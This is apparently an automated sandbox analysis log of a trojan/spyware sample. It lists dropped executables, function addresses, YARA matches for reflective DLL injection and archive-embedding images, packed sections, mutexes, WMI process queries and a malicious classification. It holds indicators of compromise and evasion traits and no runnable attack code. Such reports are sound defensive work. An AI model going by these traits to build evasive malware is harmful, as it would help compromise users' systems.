Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684594D10	11_2_00007FF684594D10
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845AACDC	11_2_00007FF6845AACDC
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845BACDC	11_2_00007FF6845BACDC
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D43990	12_2_00007FF711D43990
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D55B14	12_2_00007FF711D55B14
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D5FA54	12_2_00007FF711D5FA54
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D5E200	12_2_00007FF711D5E200
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D581A4	12_2_00007FF711D581A4
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D629B4	12_2_00007FF711D629B4
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D454C0	12_2_00007FF711D454C0
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D614A4	12_2_00007FF711D614A4
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D44C00	12_2_00007FF711D44C00
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D573E8	12_2_00007FF711D573E8
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D53BD0	12_2_00007FF711D53BD0
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D5EDA0	12_2_00007FF711D5EDA0
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D4CD7C	12_2_00007FF711D4CD7C
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD75EC0	13_2_00007FF61DD75EC0
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD65D60	13_2_00007FF61DD65D60
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD69B00	13_2_00007FF61DD69B00
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD6CA90	13_2_00007FF61DD6CA90
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD74D20	13_2_00007FF61DD74D20
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD73CE0	13_2_00007FF61DD73CE0
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD67C50	13_2_00007FF61DD67C50
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD6B600	13_2_00007FF61DD6B600
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD6E790	13_2_00007FF61DD6E790
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDBE170	13_2_00007FF61DDBE170
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD9E440	13_2_00007FF61DD9E440
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD783F0	13_2_00007FF61DD783F0
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDB0F30	13_2_00007FF61DDB0F30
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD91F30	13_2_00007FF61DD91F30
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD72EF0	13_2_00007FF61DD72EF0
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDBFDA0	13_2_00007FF61DDBFDA0
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDB3D40	13_2_00007FF61DDB3D40
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD710F0	13_2_00007FF61DD710F0
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDB2040	13_2_00007FF61DDB2040
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD69030	13_2_00007FF61DD69030
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDAF004	13_2_00007FF61DDAF004
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD61000	13_2_00007FF61DD61000
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD88010	13_2_00007FF61DD88010
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDAEAF8	13_2_00007FF61DDAEAF8
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDBDAD4	13_2_00007FF61DDBDAD4
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD8EA20	13_2_00007FF61DD8EA20
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD61A20	13_2_00007FF61DD61A20
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD66970	13_2_00007FF61DD66970
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDBED1C	13_2_00007FF61DDBED1C
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD94D10	13_2_00007FF61DD94D10
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDAACDC	13_2_00007FF61DDAACDC
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDBACDC	13_2_00007FF61DDBACDC
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD96CB0	13_2_00007FF61DD96CB0
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDB4C10	13_2_00007FF61DDB4C10
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD95720	13_2_00007FF61DD95720
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDC070C	13_2_00007FF61DDC070C
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD986C0	13_2_00007FF61DD986C0
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDAA698	13_2_00007FF61DDAA698
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDBA65C	13_2_00007FF61DDBA65C
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDBD544	13_2_00007FF61DDBD544
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD8F910	13_2_00007FF61DD8F910
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDB18B8	13_2_00007FF61DDB18B8
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD6D8A6	13_2_00007FF61DD6D8A6
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD69830	13_2_00007FF61DD69830
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD897C0	13_2_00007FF61DD897C0
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD617A0	13_2_00007FF61DD617A0
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDC3774	13_2_00007FF61DDC3774
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDC52F0	13_2_00007FF61DDC52F0
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDBD2C8	13_2_00007FF61DDBD2C8
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDC2298	13_2_00007FF61DDC2298
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDAA290	13_2_00007FF61DDAA290
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDAB1E4	13_2_00007FF61DDAB1E4
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD721C0	13_2_00007FF61DD721C0
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDBA1C8	13_2_00007FF61DDBA1C8
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD90190	13_2_00007FF61DD90190
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD66190	13_2_00007FF61DD66190
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD6E4AA	13_2_00007FF61DD6E4AA
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDAA494	13_2_00007FF61DDAA494
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD9D410	13_2_00007FF61DD9D410
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD613D0	13_2_00007FF61DD613D0
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD983A0	13_2_00007FF61DD983A0

Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: String function: 00007FF61DD81B10 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: String function: 00007FF61DD98F10 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: String function: 00007FF61DD7F4A0 appears 112 times
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: String function: 00007FF61DD992E0 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: String function: 00007FF61DD860E0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: String function: 00007FF61DD844A0 appears 127 times
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: String function: 00007FF61DD808C0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: String function: 00007FF643F41B10 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: String function: 00007FF643F58F10 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: String function: 00007FF643F3F4A0 appears 112 times
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: String function: 00007FF643F592E0 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: String function: 00007FF643F460E0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: String function: 00007FF643F444A0 appears 127 times
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: String function: 00007FF643F408C0 appears 31 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 002580C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00FCDF80 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00FC80C0 appears 260 times
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: String function: 00007FF6845844A0 appears 127 times
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: String function: 00007FF6845808C0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: String function: 00007FF6845860E0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: String function: 00007FF684581B10 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: String function: 00007FF6845992E0 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: String function: 00007FF684598F10 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: String function: 00007FF68457F4A0 appears 112 times

Source: random[1].exe.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: be08f59021.exe.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 44.2.firefox.exe.144aa0f0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 43.2.firefox.exe.2392c270000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 44.2.firefox.exe.144aa140000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 44.2.firefox.exe.144aa140000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 44.2.firefox.exe.144aa0f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 43.2.firefox.exe.2392c270000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 20.3.explorer.exe.d60a960.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 43.2.firefox.exe.2392dca0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 20.0.explorer.exe.89a0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 20.3.explorer.exe.d60a960.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 20.0.explorer.exe.89a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 43.2.firefox.exe.2392dca0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000002C.00000002.2615996030.00000144AA140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000002B.00000002.2491500061.000002392DCA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000002B.00000002.2489426233.000002392C270000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000002C.00000002.2615892313.00000144AA0F0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000014.00000000.2216112963.00000000089A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\output[1].png, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\output[1].png, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.

Source: Y-Cleaner.exe.22.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].22.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: random[2].exe.7.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: random[2].exe.7.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: random[2].exe1.7.dr	Static PE information: Section: tdoajogz ZLIB complexity 0.9946871470256025
Source: d8d3046b98.exe.7.dr	Static PE information: Section: tdoajogz ZLIB complexity 0.9946871470256025

Source: d8d3046b98.exe.7.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[2].exe1.7.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@113/133@73/14

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

Code function: 9_2_00007FF643F25D60 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep,SleepEx,_invalid_parameter_noinfo_noreturn,

9_2_00007FF643F25D60

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

Code function: 9_2_00007FF643F35EC0 GetModuleFileNameA,GetLastError,GetLastError,CoInitializeEx,CoCreateInstance,CoUninitialize,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,SysAllocString,SysFreeString,CoUninitialize,SysAllocString,SysFreeString,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,SysFreeString,CoUninitialize,SysAllocString,VariantInit,SysAllocString,SysAllocString,SysFreeString,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

9_2_00007FF643F35EC0

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

File created: C:\Program Files\Google\Chrome\Extensions

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\dwVrTdy[1].exe

Jump to behavior

Source: C:\Windows\System32\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\worker_RdDwvE
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
Source: C:\Windows\System32\audiodg.exe	Mutant created: \Sessions\1\BaseNamedObjects\worker_kBEqZh
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\worker_BAccdq
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6460:120:WilError_03
Source: C:\Windows\System32\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\GqgWzd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1492
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1492
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1492
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1492
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4540
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4540
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4540
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4540
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
